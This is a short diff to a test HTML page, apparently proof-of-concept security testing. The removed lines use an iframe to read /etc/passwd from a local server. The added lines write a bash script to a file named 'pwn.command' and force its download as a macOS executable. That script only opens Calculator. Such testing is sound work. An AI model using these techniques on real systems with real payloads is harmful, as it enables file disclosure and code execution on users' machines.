--- a/test_rc.html
+++ b/test_rc.html
@@ -1,6 +1,18 @@
-<iframe 
-  src="http://localhost:4000/etc/passwd" 
-  width="100%" 
-  height="600px" 
-  style="border:1px solid black;">
-</iframe>
+<!DOCTYPE html>
+<html>
+<body>
+  <script>
+    const payload = `#!/bin/bash
+open -a Calculator
+`;
+    const blob = new Blob([payload], { type: "text/plain" });
+    const url = URL.createObjectURL(blob);
+    const a = document.createElement("a");
+    a.href = url;
+    a.download = "pwn.command";  // macOS executable
+    document.body.appendChild(a);
+    a.click();
+    a.remove();
+  </script>
+</body>
+</html>
